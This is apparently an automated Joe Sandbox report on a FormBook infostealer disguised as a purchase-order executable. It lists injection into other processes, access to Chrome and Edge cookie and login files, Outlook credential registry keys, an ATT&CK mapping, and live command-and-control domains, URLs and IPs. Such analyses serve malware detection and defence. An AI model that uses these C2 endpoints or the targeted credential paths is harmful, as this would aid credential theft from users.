              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 6976Jump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3920201965.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, DlLArodfwUXcDj.exe, 00000003.00000000.2340711633.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3920201965.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, DlLArodfwUXcDj.exe, 00000003.00000000.2340711633.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3920201965.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, DlLArodfwUXcDj.exe, 00000003.00000000.2340711633.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3920201965.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, DlLArodfwUXcDj.exe, 00000003.00000000.2340711633.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.PO No. 0146850827805 HSP00598420.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3920171472.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3920397657.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2419345292.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.PO No. 0146850827805 HSP00598420.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3920171472.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3920397657.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2419345292.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		212
              Process Injection              		2
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		212
              Process Injection              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Abuse Elevation Control Mechanism              		NTDS2
              File and Directory Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
              Obfuscated Files or Information              		LSA Secrets12
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PO No. 0146850827805 HSP00598420.exe69%VirustotalBrowse
              PO No. 0146850827805 HSP00598420.exe68%ReversingLabsWin32.Backdoor.FormBook
              PO No. 0146850827805 HSP00598420.exe100%AviraHEUR/AGEN.1318544
              PO No. 0146850827805 HSP00598420.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://cifasnc.info/8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg0%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH4gP8KF2Qn8j/cmS57RgWwvqcfmQWCIyf50xkCSEufT28mA==&ml=PF-8nXUHD0%Avira URL Cloudsafe
              http://www.adadev.info/ctdy/100%Avira URL Cloudmalware
              http://www.cifasnc.info0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/?R4Stj2k=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acsoaYUTukUw5/VlLJHlB4H68wgcF/MAlZiH8mu7MSOf5Syg==&ml=PF-8nXUHD0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/0%Avira URL Cloudsafe
              http://www.lonfor.website/bowc/?R4Stj2k=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO84RxecymeNEzyLIaWcKrL+RZ5eMRfwg+qeUwmqwyFGBk9g==&ml=PF-8nXUHD0%Avira URL Cloudsafe
              http://www.investshares.net/cf9p/?R4Stj2k=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFI57Xl4izZbo5Nf+t7hBu9DYDZsVVcrRpMjG9JV+RkwAygg==&ml=PF-8nXUHD0%Avira URL Cloudsafe
              http://www.adadev.info/ctdy/?ml=PF-8nXUHD&R4Stj2k=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZHUsO9SJV5WPis6dAAfaCKHAM87QjltbifMPVPoLSKwbdMw==100%Avira URL Cloudmalware
              http://www.grimbo.boats/kxtt/0%Avira URL Cloudsafe
              http://www.investshares.net/cf9p/0%Avira URL Cloudsafe
              http://www.gayhxi.info/k2i2/?R4Stj2k=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTaAffH6Ebl78vR8bpDnW8pt5wmDRx2PwDjv0U4337vN//Tw==&ml=PF-8nXUHD100%Avira URL Cloudmalware
              http://www.lonfor.website/bowc/0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/?R4Stj2k=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXj2cOA9AsjjYxFgIbzI/ZykrVUFshkofZlIAuVzcX4MBGxA==&ml=PF-8nXUHD0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/100%Avira URL Cloudmalware
              http://cifasnc.info/xmlrpc.php0%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/?R4Stj2k=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddjkJxjmB725u/4P9m9WNTMgvCSsWrKIDHmR4Q2StU9f7tIQ==&ml=PF-8nXUHD100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.cifasnc.info
              		188.114.96.3
              		truefalse
                		high
                promocao.info
                		84.32.84.32
                		truetrue
                  		unknown
                  www.grimbo.boats
                  		172.67.182.198
                  		truefalse
                    		high
                    www.lonfor.website
                    		199.192.21.169
                    		truefalse
                      		high
                      www.gayhxi.info
                      		47.83.1.90
                      		truefalse
                        		high
                        www.investshares.net
                        		154.197.162.239
                        		truefalse
                          		high
                          zcdn.8383dns.com
                          		134.122.133.80
                          		truefalse
                            		high
                            www.adadev.info
                            		47.83.1.90
                            		truefalse
                              		high
                              www.ebsmadrid.store
                              		unknown
                              		unknownfalse
                                		unknown
                                www.jrcov55qgcxp5fwa.top
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.promocao.info
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.44756.pizza
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.nosolofichas.online
                                      		unknown
                                      		unknownfalse
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.grimbo.boats/kxtt/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.lonfor.website/bowc/?R4Stj2k=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO84RxecymeNEzyLIaWcKrL+RZ5eMRfwg+qeUwmqwyFGBk9g==&ml=PF-8nXUHDtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.44756.pizza/a59t/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.44756.pizza/a59t/?R4Stj2k=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acsoaYUTukUw5/VlLJHlB4H68wgcF/MAlZiH8mu7MSOf5Syg==&ml=PF-8nXUHDtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.adadev.info/ctdy/?ml=PF-8nXUHD&R4Stj2k=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZHUsO9SJV5WPis6dAAfaCKHAM87QjltbifMPVPoLSKwbdMw==true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.adadev.info/ctdy/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.cifasnc.info/8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH4gP8KF2Qn8j/cmS57RgWwvqcfmQWCIyf50xkCSEufT28mA==&ml=PF-8nXUHDtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.investshares.net/cf9p/?R4Stj2k=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFI57Xl4izZbo5Nf+t7hBu9DYDZsVVcrRpMjG9JV+RkwAygg==&ml=PF-8nXUHDtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.investshares.net/cf9p/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.promocao.info/zaz4/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.lonfor.website/bowc/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.grimbo.boats/kxtt/?R4Stj2k=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXj2cOA9AsjjYxFgIbzI/ZykrVUFshkofZlIAuVzcX4MBGxA==&ml=PF-8nXUHDtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.promocao.info/zaz4/?R4Stj2k=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddjkJxjmB725u/4P9m9WNTMgvCSsWrKIDHmR4Q2StU9f7tIQ==&ml=PF-8nXUHDtrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.cifasnc.info/8rr3/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.gayhxi.info/k2i2/?R4Stj2k=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTaAffH6Ebl78vR8bpDnW8pt5wmDRx2PwDjv0U4337vN//Tw==&ml=PF-8nXUHDtrue
                                        • Avira URL Cloud: malware
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabfc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icofc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://cifasnc.info/8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWgDlLArodfwUXcDj.exe, 00000003.00000002.3925085807.0000000007216000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 00000004.00000002.3920746147.00000000050A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.cifasnc.infoDlLArodfwUXcDj.exe, 00000003.00000002.3926275354.00000000084BD000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.ecosia.org/newtab/fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ac.ecosia.org/autocomplete?q=fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://cifasnc.info/xmlrpc.phpDlLArodfwUXcDj.exe, 00000003.00000002.3925085807.0000000007216000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 00000004.00000002.3920746147.00000000050A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          154.197.162.239
                                                          		www.investshares.netSeychelles
                                                          		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                          172.67.182.198
                                                          		www.grimbo.boatsUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          199.192.21.169
                                                          		www.lonfor.websiteUnited States
                                                          		22612NAMECHEAP-NETUSfalse
                                                          47.83.1.90
                                                          		www.gayhxi.infoUnited States
                                                          		3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                                          188.114.96.3
                                                          		www.cifasnc.infoEuropean Union
                                                          		13335CLOUDFLARENETUSfalse
                                                          84.32.84.32
                                                          		promocao.infoLithuania
                                                          		33922NTT-LT-ASLTtrue
                                                          134.122.133.80
                                                          		zcdn.8383dns.comUnited States
                                                          		64050BCPL-SGBGPNETGlobalASNSGfalse

                                                          General Information

                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1592547
                                                          Start date and time:2025-01-16 09:22:51 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 50s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Run name:Run with higher sleep bypass
                                                          Number of analysed new started processes analysed:6
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:PO No. 0146850827805 HSP00598420.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@5/1@11/7
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 87%
                                                          • Number of executed functions: 14
                                                          • Number of non-executed functions: 329
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.

                                                          Simulations

                                                          Behavior and APIs

                                                          No simulations

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          154.197.162.239PO No. 0146850827805 HSP0059842.exeGet hashmaliciousFormBookBrowse
                                                          • www.investshares.net/cf9p/
                                                          New Order#12125.exeGet hashmaliciousFormBookBrowse
                                                          • www.investshares.net/cf9p/
                                                          CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                          • www.investshares.net/cf9p/
                                                          CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                          • www.investshares.net/cf9p/
                                                          PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                          • www.investshares.net/cf9p/
                                                          Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                          • www.investshares.net/cf9p/
                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                          • www.investshares.net/cf9p/
                                                          inv#12180.exeGet hashmaliciousFormBookBrowse
                                                          • www.investshares.net/cf9p/
                                                          172.67.182.198CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                          • www.grimbo.boats/kxtt/
                                                          gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                          • www.grimbo.boats/nuxf/
                                                          rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                          • www.grimbo.boats/mjs1/
                                                          inv#12180.exeGet hashmaliciousFormBookBrowse
                                                          • www.grimbo.boats/kxtt/
                                                          CJE003889.exeGet hashmaliciousFormBookBrowse
                                                          • www.grimbo.boats/mjln/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.grimbo.boatsPO No. 0146850827805 HSP0059842.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          New Order#12125.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.182.198
                                                          gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.182.198
                                                          FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.182.198
                                                          www.cifasnc.infoPO No. 0146850827805 HSP0059842.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          New Order#12125.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.128.109
                                                          bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                          • 172.67.128.109

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          COMING-ASABCDEGROUPCOMPANYLIMITEDHKsora.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 45.197.136.84
                                                          PO No. 0146850827805 HSP0059842.exeGet hashmaliciousFormBookBrowse
                                                          • 154.197.162.239
                                                          xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                          • 156.250.23.181
                                                          https://9817157365.com/Get hashmaliciousUnknownBrowse
                                                          • 103.255.47.24
                                                          New Order#12125.exeGet hashmaliciousFormBookBrowse
                                                          • 154.197.162.239
                                                          CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                          • 154.197.162.239
                                                          CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                          • 154.197.162.239
                                                          FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                          • 156.226.63.13
                                                          smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                          • 156.226.63.13
                                                          qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                                          • 156.226.63.13
                                                          VODANETInternationalIP-BackboneofVodafoneDE3500 ADUM1401ARWZ-RL ANALOG DEVICES.exeGet hashmaliciousFormBookBrowse
                                                          • 47.83.1.90
                                                          boatnet.arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                          • 188.107.45.142
                                                          PO No. 0146850827805 HSP0059842.exeGet hashmaliciousFormBookBrowse
                                                          • 47.83.1.90
                                                          PO -2025918.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 47.83.1.90
                                                          bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 92.218.91.26
                                                          bot.ppc.elfGet hashmaliciousUnknownBrowse
                                                          • 92.218.245.175
                                                          xd.spc.elfGet hashmaliciousMiraiBrowse
                                                          • 88.79.137.163
                                                          XB6SkLK7Al.dllGet hashmaliciousWannacryBrowse
                                                          • 47.70.157.78
                                                          F1G5BkUV74.dllGet hashmaliciousWannacryBrowse
                                                          • 178.11.135.196
                                                          hsmSW6Eifl.dllGet hashmaliciousWannacryBrowse
                                                          • 178.7.0.211
                                                          CLOUDFLARENETUS3500 ADUM1401ARWZ-RL ANALOG DEVICES.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.83.145
                                                          MACHINE SPECIFICATION.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                          • 104.21.16.1
                                                          https://56.hanagibenewe.ru/Y7MD/Get hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          creal.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                          • 104.26.13.205
                                                          54403 ADVANCED DEMURRAGE PROFORMA 15.01.2025.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 104.21.64.1
